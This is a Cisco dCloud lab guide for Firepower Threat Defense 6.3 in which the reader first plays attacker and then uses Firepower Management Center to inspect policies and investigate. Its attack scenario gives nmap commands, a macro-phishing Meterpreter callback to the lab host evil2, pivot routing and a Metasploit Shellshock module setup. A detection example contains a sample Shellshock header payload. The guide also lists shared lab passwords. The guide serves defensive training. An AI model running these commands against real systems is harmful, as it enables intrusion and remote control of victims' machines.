
Cisco dCloud

Cisco Firepower Threat Defense 6.3 Attack Lab


Last Updated: March 2019
dCloud: The Cisco Demo Cloud

IMPORTANT! This content includes pre-release software, and you may experience issues with some features. The included
documentation was not created or verified by dCloud. Check Cisco dCloud regularly for new releases!

About This Lab


The Cisco Firepower Threat Defense 6.3 Attack Lab includes the following scenarios:

 Scenario 1: The Attack—assume the role of an attacker, perform a realistic attack against the target organization, use phishing
with a malicious Excel file to take control of a client on the inside of the network, and leverage the compromised client to attack
other systems on the inside.

 Scenario 2: Getting Started with Firepower Management Center—become familiar with the Firepower Management Center
(FMC) in order to understand its overall structure, including how FMC automatically discovers the network it is
protecting, the operating systems, the applications, relevant vulnerabilities, and logged-in users. This also focuses on a typical
NGFW policy, understanding the ability to create policies to control applications and to leverage user identity from Cisco
Identity Services Engine (ISE). This section also briefly touches on remote access configuration.

 Scenario 3: Detection and Analysis—investigate a reported attack (the one from Scenario 1) using Firepower Management
Center, looking at Indicators of Compromise (IoCs) and correlating events from IPS, Advanced Malware Protection (AMP),
and Security Intelligence to understand the attack and the impact.

 Scenario 4: Rapid Threat Containment with Cisco ISE—here we will see how the NGFW can request that a client found to be
compromised be put immediately and automatically into quarantine by Cisco Identity Services Engine.

 Scenario 5: Reporting—analyze and customize sample reports.

The Lab Guide includes the following sections:


About This Lab
Requirements
What’s New
About This Solution
Topology
Get Started
Scenario 1. The Attack
Scenario 2. Getting Familiarized with Firepower Management Center
Scenario 3. Detection and Analysis
Scenario 4. Rapid Threat Containment
Scenario 5. Reporting

© 2019 Cisco and/or its affiliates. All rights reserved. This document is Cisco Public Information. Page 1 of 63

Requirements
The table below outlines the requirements for this preconfigured demonstration.
Table 1. Requirements

Required: Laptop
Optional: Cisco AnyConnect

What’s New
 FMC and FTD now upgraded to 6.3

 The hacking scenario has been simplified, further scripted and now relying only on Metasploit.

 Renewed certificates of lab components (FMC, ISE, FTD, ASA, Workstations).

 AnyConnect SSL sessions now always terminate on FTD. This includes Scenario 4, Rapid Threat Containment, since
FTD v6.3 supports Change of Authorization (CoA). The ASAv previously used for this scenario has been removed from
the topology.

About This Solution


The lab is aimed at technical decision makers, security engineers and CSOs with an interest in security technology. The focus is
not on how to install or configure the NGFW (the Before Phase) but rather to detect, investigate and mitigate attacks (the After
Phase). Therefore, we will start working with a preconfigured system.

NOTE: The lab assumes an understanding of the techniques used by attackers in the Attack Kill Chain. However, the lab instructions
will lead you step by step through conducting the attacks.

The lab does not assume any prior training on Firepower.


Topology
This content includes preconfigured hosts, users and components which will be used to execute the scripted scenarios and
demonstrate the features of the Firepower solution. Most components are fully configurable with predefined administrative user
accounts. You can see the IP address and user account credentials to use to access a component by clicking the component icon
in the dCloud Topology menu of your active session and in the scenario steps of the lab guide.

Figure 1. dCloud Topology


Figure 2. Lab Topology


Systems in this lab

The following information applies to the preconfigured hosts and users in this lab:

 Jumper—this is the Jump host from which you can access other systems in this lab.

 Evil2—this is the system from which the attacks are launched in Scenario 1.

 Workstation-A—this is a client logically inside the target organization. It can be reached via remote desktop on its public IP
(198.18.133.38). Workstation-A is preconfigured to automatically establish an AnyConnect VPN to FTD. Both traffic to the
inside of the network (198.19.10.0) and traffic to the internet go inside the tunnel and are inspected by FTD.

 IoT Surveillance camera—this is the ultimate target of the attack in this scenario.

 FTD—the FTD is managed via the FMC and will not be accessed directly.

 FMC will be accessed via Jumper using Chrome.

 There are also other systems to support the lab, such as the Active Directory Domain Controller and Cisco Identity Services
Engine (ISE). There should be no reason to access these systems directly.

 Workstation-B and Remediation: they appear on the topology, but are not used in this lab.

Table 2. Preconfigured User Information

Device           IP Address        User ID          Password
Jumper           198.18.133.135    cisco            C1sco12345
Evil2            198.18.133.111    root             C1sco12345
Workstation-A    198.18.133.38     DCLOUD\mordiac   C1sco12345
FMC (public IP)  198.18.133.10     admin            C1sco12345

Get Started
A reservation for this lab will need to be performed from the dCloud Catalog. For those attending a Cisco event, such as
NGFW-TD, the sessions will have already been created and the instructor will distribute the credentials.

1. Once connected to dcloud.cisco.com, initiate your Cisco Firepower Threat Defense v6.3 attack lab by clicking on the View
button. [if you need help: Show Me How]

NOTE: If you just scheduled your session, it might report Starting…. It may take up to 10 minutes for your session to become
active; the button turns green and reads View when it is ready.

2. Optionally, for better performance, you may connect to the lab with Cisco AnyConnect VPN [Show Me How] and use the
local RDP client installed on the computer you are using to access dCloud [Show Me How].

 Jumper: 198.18.133.135, Username: cisco, Password: C1sco12345

3. Alternatively, if performance is acceptable, from the active topology page, click on Jumper, and select Remote Desktop [see
note below]

NOTE: You can also connect to the workstations using the Cisco dCloud Remote Desktop client [Show Me How]. The dCloud
Remote Desktop client works best for accessing an active session with minimal interaction. However, many users experience
connection and performance issues with this method.

4. On Jumper, open Chrome and connect to the Firepower Management Center at https://fmc. Logon with the credentials:
admin/C1sco12345.

5. Test connectivity to Workstation-A by clicking the desktop icon workstationA and logging in with the username
DCLOUD\mordiac and the password C1sco12345.


Figure 3. Accessing Workstation-A from Jumper.


6. From Workstation-A, test connectivity to the critical IoT device (which contains incredibly sensitive information) by opening
Chrome, and navigating to http://iot.dcloud.cisco.com. (This step will also generate traffic to the IoT with which the FMC will
be able to determine the OS and applications running on the IoT device).

Figure 4. Successful connectivity to IoT

7. From Jumper's desktop, open MTPuTTY, which we will use to check connectivity to evil2.

8. Expand the MTPuTTY sessions section and double-click on evil2. You should be automatically logged in with username
root and password C1sco12345.


Figure 5. MTPuTTY Configurations for evil2



Scenario 1. The Attack


In this scenario, we assume the role of the hacker and we will carry out a vicious attack. The attacker has done some research and
found out that:

 The organization has an employee, Mordiac, who happens to be the CFO but is also one of the IT administrators. Mordiac
also happens to be looking for a new job (he has just updated his LinkedIn profile). Our attacker discovered his potential
victim through social engineering.

 There is an internal device IoT.dcloud.cisco.com at 198.19.10.211 with some juicy corporate secrets. The attacker would
really like to get access to this device.

Steps
1. From Jumper, use the SSH session to evil2. Attempt to get to the internal server iot.dcloud.cisco.com. Scan IoT with nmap
to see if it has ports 80 or 443 open. Type the following nmap command manually, since copy/paste from the Lab Guide
PDF may not work.
nmap -P0 198.19.10.211 -p 80,443

where:

-P0 means to skip the Nmap host discovery stage for 198.19.10.211 and treat the host as already online (the character is the
digit 0, not a capital letter O; -P0 still works, but the current spelling of this option is -Pn, with -PN as another accepted alias).

-p means to perform a port scan on the specific ports mentioned (HTTP and HTTPS in this case).

Figure 6. nmap scan against IoT device.

NOTE: Nmap (see www.nmap.org) is a well-known tool for attackers and penetration testers that does scanning and much more.

2. The results below show that the attacker cannot reach the IoT device directly (note the word filtered: the probes got no
answer, which means a packet filter in the path dropped them; a closed port, by contrast, would mean the host answered with
a RST and is reachable).
root@evil2:~# nmap -P0 198.19.10.211 -p 80,443

Starting Nmap 7.50 ( https://nmap.org ) at 2018-06-24 03:13 EDT

Nmap scan report for 198.19.10.211
Host is up.
PORT STATE SERVICE
80/tcp filtered http
443/tcp filtered https

Nmap done: 1 IP address (1 host up) scanned in 3.10 seconds
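The scan above is small enough to read by eye; when a scan covers many hosts and ports, parsing Nmap's normal output and applying the filtered/closed/open reasoning programmatically avoids mistakes. The Python below is an added example, not part of the lab guide and not Nmap code: it parses the report format shown above (SAMPLE_SCAN is a constructed copy of the lab's result, so nothing needs to be scanned) and classifies each host from its port states. The function and variable names are this example's own.

```python
"""Parse Nmap "normal" output and classify hosts from their port states.

Added example: not part of the dCloud lab guide and not Nmap code. It works on
the text Nmap prints to the terminal (the format shown in the lab), so it runs
offline; SAMPLE_SCAN is a constructed copy of the lab's scan result.
"""
import re
from typing import Dict, List

SAMPLE_SCAN = """\
Starting Nmap 7.50 ( https://nmap.org ) at 2018-06-24 03:13 EDT
Nmap scan report for 198.19.10.211
Host is up.
PORT    STATE    SERVICE
80/tcp  filtered http
443/tcp filtered https

Nmap done: 1 IP address (1 host up) scanned in 3.10 seconds
"""

# "Nmap scan report for <host>" opens each host block; port lines look like
# "80/tcp  filtered http". Nmap's port states are open, closed, filtered,
# unfiltered, open|filtered and closed|filtered.
_HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")
_PORT_LINE = re.compile(
    r"^(\d+)/(tcp|udp)\s+"
    r"(open\|filtered|closed\|filtered|open|closed|filtered|unfiltered)\s+(\S+)"
)


def parse_nmap_normal(text: str) -> Dict[str, List[dict]]:
    """Return {host: [{"port", "proto", "state", "service"}, ...]}."""
    hosts: Dict[str, List[dict]] = {}
    current = None
    for line in text.splitlines():
        m = _HOST_LINE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []
            continue
        m = _PORT_LINE.match(line)
        if m and current is not None:
            port, proto, state, service = m.groups()
            hosts[current].append(
                {"port": int(port), "proto": proto, "state": state, "service": service}
            )
    return hosts


def classify_host(ports: List[dict]) -> str:
    """Turn port states into the conclusion an attacker (or defender) draws.

    filtered: the probe got no reply, or an ICMP "administratively prohibited";
              a packet filter between scanner and host is dropping it.
    closed:   the host answered with a TCP RST, so it is reachable, but nothing
              listens on that port.
    open:     a service completed the handshake.
    """
    if not ports:
        return "no-ports"
    states = {p["state"] for p in ports}
    if states == {"filtered"}:
        return "firewalled"          # every probe dropped: what the lab's scan shows
    if "open" in states:
        return "reachable-open"
    if states <= {"closed", "filtered"}:
        return "reachable-closed"    # at least one RST came back: host is on the path
    return "ambiguous"               # unfiltered / open|filtered need a follow-up scan


if __name__ == "__main__":
    for host, ports in parse_nmap_normal(SAMPLE_SCAN).items():
        print(host, classify_host(ports), [(p["port"], p["state"]) for p in ports])
```

For the lab's scan the classifier returns "firewalled", which is the same conclusion the attacker draws in step 3: the target is behind a policy that drops unsolicited traffic, so a path around the filter is needed.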

3. Since evil2 cannot reach the target IoT device directly, the attacker will try to compromise another corporate client and use
it as a springboard to attack inside hosts. The attacker discovers a corporate client, Workstation-A, which he thinks he can
compromise. Though Workstation-A is connected to the internet, it also has connectivity to the inside corporate network via a
VPN tunnel. The attacker has prepared a number of Excel spreadsheets embedded with malicious macros. Those macros are
crafted to bypass antivirus. The attacker will trick the Workstation-A user into downloading and opening one of those
spreadsheets. The malicious macro will initiate a connection from Workstation-A to evil2, thus opening a Command and
Control connection back to the hacker. Evil2 will then have a foothold on Workstation-A and will use it to launch the attack on
the ultimate target: the IoT device.

4. Let's prepare evil2 to accept the incoming connection from Workstation-A. On evil2, run the predefined script starthack to
start Metasploit. With this script, evil2 will wait for an incoming connection, from a compromised workstation, on its port 8086.
root@evil2:~# starthack

5. The following screen output displays.


Figure 7. Starting Metasploit


NOTE: Metasploit is a well-known formidable attack framework, used by both penetration testers and attackers.

6. From Jumper, use the already opened RDP session to Workstation-A and verify that the AnyConnect VPN session is
established back to the corporate network: click the expansion arrow in the system tray, then click the AnyConnect icon.
If you are not connected, click Connect.


Figure 8. Check that AnyConnect is connected.


7. On Workstation-A, open Firefox. The homepage should open as follows:

8. Now, let's see what happens when a user connects to a website that, unknowingly, propagates malware. From Workstation-A's
Firefox default page, click Download files.


Figure 9. Using Firefox on Workstation-A to access a website and download files (unknowingly that malware is present)


9. This displays a few Excel files to download. As an unsuspecting user would do, click the link Catjob2.xls and try to download
it. It will fail, as this type of malware is known and can be stopped immediately.


Figure 10. Excel File infected with a known malware, thus blocked


10. Click OK to close the Downloading dialog box, and click Cancel.

11. Click opportunity.xls. This file carries a zero-day exploit: it is carefully coded to bypass defenses. This spreadsheet, when
opened with content enabled, will execute a script to establish a Command & Control connection back to evil2! Evil2 would
then have a foothold inside one of our corporate clients, from which it can pivot and attack other inside hosts.


Figure 11. Excel file, opportunity.xls, infected with a zero-day malware


12. Save the file to the Desktop of Workstation-A.

13. Double-click the downloaded Excel file from the desktop of Workstation-A to open it.

NOTE: You may be prompted to Enable Editing and Enable Content. These are security measures, designed to discourage
end users from running macros. However, using social engineering it is often possible to bypass this defense by fooling the
recipient into thinking that the file comes from a safe source, has safe content, etc.

NOTE: Do NOT quit the Excel application until you are done with this lab.


Figure 12. Enable Editing in Excel


Figure 13. Enable Content in Excel

14. Return to Jumper and access the SSH console for evil2. The screen should now indicate that Metasploit has received an
incoming session from the compromised client. The source IP shown, 198.18.133.11, is the FTD outside interface address:
Workstation-A's traffic leaves the VPN tunnel and is PATed behind that address.


Figure 14. Metasploit receives a session from the compromised client.


15. That shows that the Excel file was malicious and succeeded in making Workstation-A reach out to evil2 on port 8086, thus
providing the attacker with a client-side foothold. The number of AV vendors who detect a particular file as malicious
varies over time. When this type of malware was first created in January 2018, no AV vendor detected the file as malicious
(as time goes by, this has changed). This illustrates why retrospection, explained later, is important. This particular malware
resides entirely in memory and is not written to disk. Moreover, no new processes are created.

NOTE: Perimeter defenses (including Cisco’s) can always be bypassed by a determined attacker. A unique value of Cisco
NGFW (FTD) is the ability to detect the breach and to present evidence (Indicators of Compromise (IoCs)) that a breach
may have occurred. This will be explained later in this lab.

16. From the Jumper's SSH session to evil2, verify that the meterpreter session has been established. You may have to hit return
to get the msf prompt, before typing sessions -i

msf exploit(multi/handler) > sessions -i

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows DCLOUD\mordiac @ WORKSTATIONA 198.18.133.111:8086 -> 198.18.133.11:50409 (198.18.133.38)

msf exploit(multi/handler) >

NOTE: Optional steps 17-20 are to investigate how an intruder may control a compromised machine, viewing files, uploading files
etc. If you are already familiar with this, feel free to proceed directly with step 21.

17. Have evil2 interact with the compromised client, Workstation-A, by typing sessions -i 1 (where 1 is the number of your
session, which should be 1).

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

18. Verify that we can now control the compromised machine: list files (ls), steal files, upload files.

meterpreter > pwd
C:\Users\mordiac\Documents
meterpreter > ls
Listing: C:\Users\mordiac\Documents
===================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2016-03-07 14:38:21 -0500 My Music
40777/rwxrwxrwx 0 dir 2016-03-07 14:38:21 -0500 My Pictures
40777/rwxrwxrwx 0 dir 2016-03-07 14:38:21 -0500 My Videos
100666/rw-rw-rw- 402 fil 2016-03-07 14:47:14 -0500 desktop.ini

meterpreter >

19. Meterpreter also offers other interesting commands and modules: for example, it can dump credentials, start a keylogger
(capturing passwords), record from the webcam, etc. The help command lists the available commands.
meterpreter > help

Figure 15. Help command output


20. After this brief discovery of the options available to the attacker, we will turn our attention to something even more
dangerous: lateral movement. But first we need to background the meterpreter session.

meterpreter > background

Figure 16. Sending meterpreter to the background of Metasploit

21. Next, the attacker wants to attack systems on the inside corporate network by pivoting (jumping) through the compromised
Workstation-A, which has a VPN connection to the FTD and can therefore communicate with inside hosts. On evil2, we add a
route in Metasploit so that traffic for the inside corporate network is carried over session 1 (the meterpreter session).
msf exploit(handler) > route add 198.19.10.0 255.255.255.0 1

Figure 17. Pivoting – jumping via a compromised host, to any system reachable from the compromised host.

NOTE: Understand how the attack is happening via the compromised client, since the IoT device is not directly reachable. The
compromised host, Workstation-A, is physically outside of the corporate network. However, through its VPN tunnel, Workstation-A
has a network presence on the inside corporate network and can therefore communicate with other hosts of that network, including
the IoT server. So, by compromising Workstation-A, the attacker can reach the ultimate goal: the IoT device.

22. Finally, the hacker will attack the IoT device through the meterpreter session, using the route just added.

23. From the SSH window, invoke the Metasploit resource script iot.rc, which triggers the attack against the Bash Shellshock
vulnerability (CVE-2014-6271). Even though this vulnerability was disclosed in September 2014, the attacker is confident that
the targeted device may still be exploitable, since IoT systems are often neglected when it comes to releasing and deploying
patches.
msf exploit(multi/handler) > resource iot.rc
[*] Processing iot.rc for ERB directives.
resource (iot.rc)> use exploit/multi/http/apache_mod_cgi_bash_env_exec
resource (iot.rc)> set targeturi /cgi-bin/vulnerable.cgi
targeturi => /cgi-bin/vulnerable.cgi
resource (iot.rc)> set rhost 198.19.10.211
rhost => 198.19.10.211
resource (iot.rc)> set target 1
target => 1
resource (iot.rc)> set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp

24. Run the exploit.

msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

NOTE: If successful, the Shellshock exploit would take control of the vulnerable system (the IoT device in our case), and a new
meterpreter session would be returned to evil2, this time from the IoT system. In this case, however, the attack does not work,
even though the system is presumably vulnerable (not patched). We do not yet know why the Shellshock attack was not
successful: was the device patched? Or did an IPS block it? The reason for this failure will be investigated in Scenario 3.
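Scenario 3 will show whether an IPS stopped the Shellshock attempt. What a signature has to look for is small: exploit/multi/http/apache_mod_cgi_bash_env_exec places its payload in an HTTP request header (its HEADER option, User-Agent by default), Apache mod_cgi copies request headers into the CGI process environment, and an unpatched bash parses an environment value that starts with "() {" as a function definition and then runs whatever follows the body. The Python below is an added example, not part of the lab guide, of Cisco's Snort rules, or of Metasploit: it parses a raw request and flags headers carrying that prologue. The two sample requests are constructed; the command in the attack sample only echoes a string, and all names in the code are this example's own.

```python
"""Flag Shellshock (CVE-2014-6271) attempts in raw HTTP requests.

Added example: not part of the dCloud lab guide, of Cisco's Snort rules, or of
Metasploit. The two requests below are constructed; the "attack" one only echoes
a string, it is the shape of the header that matters.
"""
import re
from typing import Dict, List, Optional

# Before the fix (bash 4.3 patch 25), bash imported any environment variable
# whose value started with "() {" as a function and kept executing whatever
# followed the closing brace. Apache mod_cgi exports request headers into the
# CGI's environment as HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE, ..., so a
# header value beginning with that prologue reaches the vulnerable parser.
_PROLOGUE = re.compile(r"\(\s*\)\s*\{")

# Header names mod_cgi turns into environment variables; any of them can carry
# the payload, these are the ones most used by exploit tools and scanners.
_WATCHED = ("user-agent", "referer", "cookie", "host",
            "accept", "accept-language", "x-forwarded-for")


def parse_request(raw: str) -> Dict[str, str]:
    """Split an HTTP/1.x request head into {lower-cased header name: value}."""
    lines = raw.split("\r\n")
    headers: Dict[str, str] = {"__request_line__": lines[0]}
    for line in lines[1:]:
        if not line:            # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def shellshock_hits(raw: str) -> List[str]:
    """Return the names of watched headers whose value carries the prologue."""
    headers = parse_request(raw)
    return [h for h in _WATCHED if h in headers and _PROLOGUE.search(headers[h])]


def extract_command(value: str) -> Optional[str]:
    """Return what bash would run after the bogus function body, or None."""
    m = re.match(r"\(\s*\)\s*\{[^}]*\}\s*;\s*(.+)$", value)
    return m.group(1).strip() if m else None


# Constructed samples aimed at the lab's CGI path.
BENIGN = ("GET /cgi-bin/vulnerable.cgi HTTP/1.1\r\n"
          "Host: iot.dcloud.cisco.com\r\n"
          "User-Agent: Mozilla/5.0 (Windows NT 10.0) Firefox/65.0\r\n"
          "\r\n")
ATTACK = ("GET /cgi-bin/vulnerable.cgi HTTP/1.1\r\n"
          "Host: 198.19.10.211\r\n"
          "User-Agent: () { :;}; /bin/bash -c 'echo probe'\r\n"
          "\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("attack", ATTACK)):
        hits = shellshock_hits(req)
        print(label, "->", hits or "clean")
        for h in hits:
            print("  command:", extract_command(parse_request(req)[h]))
```

Matching on the function prologue rather than on a specific command is deliberate: the later bash parser bugs disclosed after CVE-2014-6271 use the same prologue, and the command after it is attacker-chosen. Because everything needed for the decision is in the request, an inline IPS in the path (the FTD in this lab) can drop the request before the CGI ever runs, which is one of the two explanations the note above leaves open for the failed exploit.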

Figure 18. Run the Exploit

Conclusion

This concludes the first scenario. To summarize what has happened:

 The attacker wanted to attack the internal IoT device to control the video camera.

 The attacker tried to communicate with the IoT device directly, but the traffic appeared to be blocked by the firewall.

 The attacker then launched a phishing attack against an unsuspecting corporate user, using a zero-day malware package (Excel
macro), and took control of a corporate machine that has a connection to the inside network via VPN.

 Using the compromised corporate client, Workstation-A, as a springboard, the attacker then went after the IoT device with
the Bash Shellshock attack. This attack seems to have failed; maybe an IPS blocked it, or the device was patched. You will find
out what happened in Scenario 3.

 The attacker is still in the network via the compromised corporate client, and will seek new ways to attack.

This is now a race against time.


Scenario 2. Getting Familiarized with Firepower Management Center


In this scenario, we will access the FMC and familiarize ourselves with its GUI. We will focus on:

 Context Explorer: provides detailed and interactive information about the network FMC is protecting, such as hosts, their
operating systems, their applications, their vulnerabilities and the logged-in users

 IPS Auto-Tuning: Firepower’s knowledge of the corporate network (Network discovery) can be used to automatically tune the
IPS rules

 FMC Policies: The NGFW ruleset for Firewalling, IPS, AMP & File type, SSL, Identity, etc.

 NGFW and ISE Interaction: How FMC can get identity information from ISE or Active Directory (and in a later scenario how
FMC and ISE can cooperate to mitigate the actions of a dangerous host on the corporate network)

 Managed Devices Configuration: NAT, Interfaces and Routing of FTD firewalls deployed by the corporation

NOTE: In this lab setup, the FMC may display warnings that it cannot download security intelligence – this warning can be
ignored. In a real production environment, your FMC would have consistent access to Cisco TALOS services. In the dCloud
environment however, this is not the case.

Figure 19. TALOS might be unreachable from the dCloud environment

Steps
1. From Jumper, return to the FMC session opened, earlier in the lab. If the FMC session is not there, from Jumper, open
Chrome and logon to FMC (https://fmc), using username:admin and password: C1sco12345.

2. Select Analysis > Context Explorer and adjust the time period to 1 day.

NOTE: Due to the dCloud environment, some of the information may take a long time to load. If the widgets have not loaded after
60 sec, refresh the browser page.


Figure 20. Adjust Time period for Context Explorer


3. A key feature of Firepower Management Center (FMC) is that it keeps track of the operating systems and applications used by
each host on the internal network, as well as the logged in users and vulnerabilities. Scroll down to the section on Network
Information. As you can see, FMC has discovered different Operating Systems.


Figure 21. Context Explorer – Network Information view


4. Scroll down to Application Protocol Information to examine what applications have been discovered.

Figure 22. Context Explorer – Application Protocol Information

NOTE: During lab testing, the pie chart for Hosts by Risk and Application did not consistently appear. If that pie chart is not
appearing, just move on with the lab.

5. From Analysis > Context Explorer, navigate to the widget group called Network Information, and find under Traffic by
Source IP the IP address 198.19.18.38 (Workstation-A). Then, click on the vertical bar for that IP address, and select View
Host Information from the menu.

NOTE: It is possible to click on any section of a pie chart, or any bar of a bar chart, to filter further or to drill down the
analysis (jumping to events). For specific IP addresses, it is also possible to view the host profile.


Figure 23. Context Explorer - Network Information


6. Look at the Host Information. This section displays, for that specific host, its logged-in users, Indicators of Compromise,
operating system, applications, and vulnerabilities.

Figure 24. Host Profile

7. Scroll down to examine the Applications Discovered on the host.


Figure 25. Host Profile - Applications discovered


8. Scroll down to examine the potential vulnerabilities tracked on this host. You can click on a vulnerability hyperlink to see
more details. Some vulnerabilities may not yet be publicly disclosed so details are hidden (but there may still be IPS/snort
signatures).

Figure 26. Host Profile - Vulnerabilities


NOTE: Through Network Discovery, FMC has gained knowledge of the network: hosts, their Operating Systems, the applications
and vulnerabilities running on those hosts. This information can be used to automatically fine tune the IPS policies.

9. The FMC can be configured with multiple IPS policies, which are then selectively assigned to different Access Control Policies
(ACP), which themselves are applied to different kinds of traffic. Specific ACPs can be applied based on multiple variables such
as: source, destination, applications, URL, etc. Coming back to the IPS policies: you may wish to have a specific IPS policy
for traffic dealing with file sharing, and a different policy for traffic going to webmail services. In this lab, for simplicity's sake, we
are using a single IPS policy, called dCloud-IPS. Select Policies > Access Control > Intrusion and edit the dCloud-IPS
policy by clicking the pencil icon.

Figure 27. Edit the dCloud-IPS Policy

10. You will notice that this dCloud-IPS policy is configured with the Base Policy Balanced Security and Connectivity. Using a
specific base policy as a starting point to configure the dCloud-IPS policy enables you to take advantage of the experience of
TALOS: its knowledge of the signatures available for different systems, of how prevalent given types of attack are, etc. Take a
moment to click on the down arrow of the base policies to see the possible selection. Do not change the base policy: leave it
at Balanced Security and Connectivity.

11. Through passive discovery and other methods, Firepower discovers hosts on your network, their OS, their ports and the
applications running on those clients. With that knowledge, FMC can then recommend changes to the IPS configuration. This
is the self-tuning capability of Firepower NGIPS. Obviously, the administrator has the last word on accepting the
recommended changes or not. Click on the link No Recommendations have been generated, to setup Firepower
Recommendations.

NOTE: the number of recommendations might vary in time, since those are based on Cisco Security intelligence which is
constantly updated by the TALOS team.


Figure 28. Edit IPS Policy Recommendations


12. Next, click on Generate Recommendations. After 1-2 minutes, you should have a pop-up reporting Success. Then, click
OK.

Figure 29. Generating Recommendations for IPS policies

13. Next, click View Recommended Changes. Do NOT click Use Recommendations, since it is not necessary for this lab and
in the interest of time.


Figure 30. Viewing the Recommended IPS changes


14. There are about 3000 IPS signatures which Firepower recommends you change (based on its knowledge of the network).
Tuning the IPS ruleset both improves performance and reduces the risk of false positives: rules for operating systems and
applications that are not present on the network do not need to be evaluated.

Figure 31. IPS Signatures Tuning

15. Let’s continue our tour of FMC policies. Select Policies > Access Control > Access Control. Click Leave Page if prompted.

16. In our lab, only one Access Control Policy has been configured: dCloud-Access-Policy. Organizations could have multiple
Access Control Policies, each applied to different managed devices (that is, to different FTDs). As an example, you could have a
specific ACP pushed to branch firewalls, and a different one used by the head office edge firewall. Click on the pencil icon
to edit the dCloud-Access-Policy.


Figure 32. Access Control Policies


17. Examine the different options for the dCloud-Access-Policy. It is possible to have different rules depending on Active Directory
group, application, URL category, but also on attributes from Cisco ISE. For each rule, you define whether the traffic is allowed
or blocked. You can also assign different IPS policies, or policies for AMP/file inspection and logging, per rule.


Figure 33. Access Control Policies: Policy Options


18. Try adding a new rule to examine the options for applications, URLs, Users and ISE attributes. You do not have to create the
rule and can cancel out after investigating what options are available.

Figure 34. Access Control Policies: Add Rule

Figure 35. Access Control Policies: User options (Active Directory Groups)

Figure 36. Access Control Policies: ISE Attributes

NOTE: Note the ability to assign policy based on ISE attributes such as the Security Group Tag (SGT). This allows much more flexibility
than matching on AD groups alone; we could, for example, have different policies for different device types, or different policies
depending on device posture. It also lets us write policies for devices that are not members of Active Directory (such as
iPads, printers and surveillance cameras) but that have been profiled by Cisco ISE.

Figure 37. Access Control Policies: Application Choices

19. Click on Cancel to close the Add Rule window. Examine the SSL decryption policies. Select Policies > Access Control > SSL and
edit the dCloud-SSL Policy by clicking on the pencil icon.

NOTE: In many cases it is desirable to control when SSL traffic is decrypted, for reasons of policy (law and compliance) or
performance.

It is possible to decrypt or not decrypt based on several criteria such as source IP address, destination IP address, user identity (e.g.
do not decrypt HR traffic), destination URL category (e.g. do not decrypt the Finance category) and so on.

Figure 38. SSL Policy

Figure 39. dCloud-SSL Policy

20. From Jumper, click on the RDP icon to access Workstation-A. If you don’t have the RDP icon, initiate a new RDP session by
double-clicking on the Workstation-A icon on the desktop of Jumper.

Figure 40. Accessing Workstation-A RDP session

21. We will conduct two tests of the decryption policy by trying to download malicious files. First, from Workstation-A,
using Firefox, enter the URL: https://www.evilchi.com/Catjob3.xls. The file name is case sensitive. You will see the following
dialog box.

Figure 41. Unsuccessful download of an infected file

22. Close the dialog box of the unsuccessful download. Return to the Firefox homepage and click on Download Files >
Download malware over HTTPS. If nothing happens, close and reopen Firefox and click again on Download Files >
Download malware over HTTPS. Eventually, you should see a webpage with Secure Connection Failed. This attempted
HTTPS download of an infected file also fails, and here is why: FTD calculates the SHA-256 fingerprint of the spreadsheet you are
trying to download (Catjob2.xls and Catjob3.xls each produce a unique SHA-256 hash) and queries the Advanced
Malware Protection (AMP) cloud for the reputation of that hash. AMP immediately responds that those files are
known malware, so the firewall blocks the last part of the file transfer to the client. The hash can only be computed once the
whole file has been seen, which is why it is the end of the transfer that is withheld, and which explains the message in the
dialog window: "...part could not be saved, because the source file could not be read".

Note: For SSL decryption to work on Workstation-A, this host must trust the CA certificate used by the man-in-the-middle decryption
operation. In our scenario, the MITM is performed by FTD, which re-signs server certificates with a certificate managed by FMC and
signed by the lab CA. That CA certificate was installed on all corporate clients before this lab started; without it, the browser would
show a certificate warning on every decrypted HTTPS site.

Figure 42. Download Blocked on Workstation-A – result you will get once you refresh the browser, or re-attempt.

23. On FMC, examine the device configuration for the FTD firewall. Select Devices > Device Management. In our case, we are
managing only one NGFW, called FTDv. In your environment, you could have multiple NGFW and NGIPS devices listed
here. Edit FTDv by clicking on the pencil icon.
Figure 43. Device Management on FMC.

24. Examine the configuration options for our NGFW called FTDv.

NOTE: With Firepower Threat Defense (FTD) software, FMC can configure all features such as NAT, Routing (static routes, BGP,
OSPF), DHCP server settings etc. Feel free to investigate Device Management, however, do not make any changes.

Figure 44. Configuration Options of our NGFW

25. Examine Remote Access VPN Policy: Devices > VPN > Remote Access. FTD supports terminating remote access sessions
from Cisco AnyConnect. This has already been configured (Workstation-A in this lab is configured to automatically connect to
FTD). Feel free to examine the Remote Access configuration, but do NOT make any changes.

Figure 45. Remote access VPN configuration.

Figure 46. Editing the VPN policy RA-VPN

26. View the connected Remote Access VPN users. Go to Analysis > Users > Active Sessions. We can customize the columns
shown in order to view more details on the remote access sessions. Click the 'X' in any column title
and then select which columns you wish to show. Ensure that you select all the VPN column choices. After applying, you may
have to scroll to the right to see this information.

Note: In this lab running v6.3.0, some fields are not populated. This issue is being investigated.

Figure 47. Selecting the Columns for the display

Figure 48. Details of Active Sessions with VPN columns enabled

27. You will notice that the computer icon of our Workstation-A appears in orange/red. This signifies an Indication of
Compromise for that host; we will investigate it in the next scenario.

Conclusion

This concludes the second scenario. To summarize what has happened:

 You got familiarized with Context Explorer and its investigative capability. Much more on this in the next scenario.

 You were introduced to the Intrusion Policy and how you can use the Base Policy to get started with IPS configuration and
how the IPS recommendations could be used for self-tuning.

 You looked at the configuration of Access Control Policies

 You looked briefly at the Device Configuration and VPN configuration.

Scenario 3. Detection and Analysis

In this scenario, we will focus on the Detection and Analysis capabilities of Firepower, applied to the attack performed in Scenario 1.
Firepower makes it easy to identify hosts that are compromised, by collecting Indicators of Compromise (IoCs) per host. An IoC
is a reasonable suspicion that a host may be compromised and is under the control of somebody else. With FMC, it is also
possible to quickly understand the context of the host, Operating System, running applications, vulnerabilities, malware, logged in
users, and connections to and from this host.

Steps
